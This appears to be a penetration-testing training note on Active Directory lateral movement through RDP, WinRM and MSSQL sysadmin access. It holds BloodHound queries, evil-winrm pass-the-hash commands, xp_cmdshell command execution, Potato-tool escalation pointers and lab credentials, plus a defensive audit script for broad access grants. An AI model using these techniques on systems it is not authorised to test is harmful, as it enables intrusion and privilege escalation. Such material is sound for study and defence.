Privileged Access

Lateral movement techniques in AD environments when you don’t (yet) have local admin rights. Covers enumerating and exploiting Remote Desktop (RDP), WinRM/PSRemoting, and MSSQL sysadmin access.

Overview

After gaining a foothold, if you lack local admin rights for Pass-the-Hash, these remote access methods provide alternative lateral movement paths:

| Method | Protocol | Port | Use Case |
| --- | --- | --- | --- |
| RDP | Remote Desktop Protocol | 3389 | GUI access to a target host |
| WinRM / PSRemoting | Windows Remote Management | 5985 (HTTP) / 5986 (HTTPS) | PowerShell remote command execution |
| MSSQL | TDS (SQL Server) | 1433 | OS command execution via xp_cmdshell if sysadmin |

Enumeration

BloodHound Edges

| Edge | Meaning |
| --- | --- |
| CanRDP | User can RDP to the host |
| CanPSRemote | User can use WinRM/PSRemoting on the host |
| SQLAdmin | User has sysadmin rights on a SQL Server instance |

First thing to check after importing BloodHound data: Does the Domain Users group have local admin rights or execution rights (RDP, WinRM) over any hosts?

BloodHound Pre-built Queries

  • “Find Workstations where Domain Users can RDP”
  • “Find Servers where Domain Users can RDP”

BloodHound Custom Cypher Queries

// Find users with WinRM access (Cypher uses // for comments, not --)
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

// Find users with SQL Admin access
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2

PowerView Enumeration

# Enumerate Remote Desktop Users group
Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"

# Enumerate Remote Management Users group (WinRM)
Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"

The Remote Management Users group has existed since Windows 8/Server 2012; it grants WinRM access without requiring local admin rights.
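As an added example (not from the original post, and not PowerView), the same check from the administrator's side: a PowerShell audit that pulls the members of the Remote Desktop Users, Remote Management Users and Administrators groups from a list of hosts over WinRM with the built-in Get-LocalGroupMember cmdlet and flags broad principals such as Domain Users. The host list and the set of "broad" names are assumptions.

```powershell
# Added example (not from the original post): audit who holds RDP / WinRM / admin
# rights on a set of hosts and flag broad principals such as "Domain Users".
# Assumes WinRM is enabled on the targets and the caller is a local admin there.
$Hosts      = @('ACADEMY-EA-MS01')                                   # assumption: hosts to audit
$Groups     = @('Remote Desktop Users', 'Remote Management Users', 'Administrators')
$BroadNames = @('Domain Users', 'Authenticated Users', 'Everyone', 'Users')  # assumption

$findings = foreach ($h in $Hosts) {
    foreach ($g in $Groups) {
        try {
            # Get-LocalGroupMember runs on the remote host; its output is serialised back.
            $members = Invoke-Command -ComputerName $h -ErrorAction Stop -ScriptBlock {
                param($GroupName)
                Get-LocalGroupMember -Group $GroupName -ErrorAction Stop
            } -ArgumentList $g
        } catch {
            Write-Warning "$h / '$g': $($_.Exception.Message)"
            continue
        }
        foreach ($m in $members) {
            # Member names come back as DOMAIN\name or HOST\name; compare the short name.
            $short = ($m.Name -split '\\')[-1]
            [pscustomobject]@{
                Host   = $h
                Group  = $g
                Member = $m.Name
                Type   = $m.ObjectClass
                Source = $m.PrincipalSource
                Broad  = ($BroadNames -contains $short)
            }
        }
    }
}

# Broad grants first: these are the "Domain Users can RDP/WinRM" cases BloodHound surfaces.
$findings |
    Sort-Object -Property @{ Expression = 'Broad'; Descending = $true }, Host, Group |
    Format-Table -AutoSize
```

Any row with Broad set to True is a grant worth reviewing, since it gives every domain account the corresponding remote access on that host.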

Remote Desktop (RDP)

Even without local admin, RDP access lets you:

  • Launch further attacks from a new network position
  • Escalate privileges locally and harvest credentials
  • Pillage the host for sensitive data

Connecting

# From Linux
xfreerdp /v:TARGET_IP /u:DOMAIN\\user /p:'password' /cert-ignore

# Or with Remmina (GUI)
remmina

# From Windows
mstsc.exe /v:TARGET_IP

All Domain Users having RDP access is common on RDS/jump hosts — always check these for credentials and privilege escalation vectors.

WinRM / PSRemoting

From Windows (Enter-PSSession)

$password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("INLANEFREIGHT\forend", $password)
Enter-PSSession -ComputerName ACADEMY-EA-MS01 -Credential $cred

From Linux (evil-winrm)

# Install
gem install evil-winrm

# Connect with password
evil-winrm -i TARGET_IP -u user -p 'password'

# Connect with NTLM hash
evil-winrm -i TARGET_IP -u user -H NTLM_HASH

Key evil-winrm flags:

| Flag | Purpose |
| --- | --- |
| -i | Target IP or hostname |
| -u | Username |
| -p | Password |
| -H | NTLM hash (pass-the-hash) |
| -s | Path to PowerShell scripts to upload |
| -e | Path to C# executables to upload |
| -S | Enable SSL (port 5986) |

SQL Server Admin

MSSQL sysadmin access is nearly guaranteed SYSTEM-level access on the host — the SQL Server service account almost always has SeImpersonatePrivilege.

Common Ways to Obtain SQL Credentials

  • Kerberoasting (SPN accounts running MSSQL)
  • LLMNR/NBT-NS poisoning
  • Password spraying
  • Snaffler (finding web.config or connection strings in file shares)

From Windows (PowerUpSQL)

Import-Module .\PowerUpSQL.ps1

# Enumerate SQL instances in the domain
Get-SQLInstanceDomain

# Run a query against a remote SQL server
Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'

From Linux (mssqlclient.py)

# Connect with Windows authentication
mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth

# Once connected:
SQL> help
SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami /priv

Privilege Escalation via SeImpersonatePrivilege

When the SQL service account has SeImpersonatePrivilege (it almost always does), escalate to SYSTEM using:

  • JuicyPotato
  • PrintSpoofer
  • RoguePotato

Check the service account's privileges from the SQL session first:

xp_cmdshell whoami /priv

If SeImpersonatePrivilege is Enabled, the host is exploitable.

Key Takeaways

  • Always check remote access rights (RDP, WinRM, SQLAdmin) after gaining each new account — even non-admin access can lead to further compromise
  • Enumeration and attack are iterative: repeat enumeration after every new account takeover
  • SQL credentials found anywhere (scripts, config files, connection strings) should be tested against all MSSQL servers in the environment
  • Non-admin RDP/WinRM access may still yield sensitive data or local privilege escalation paths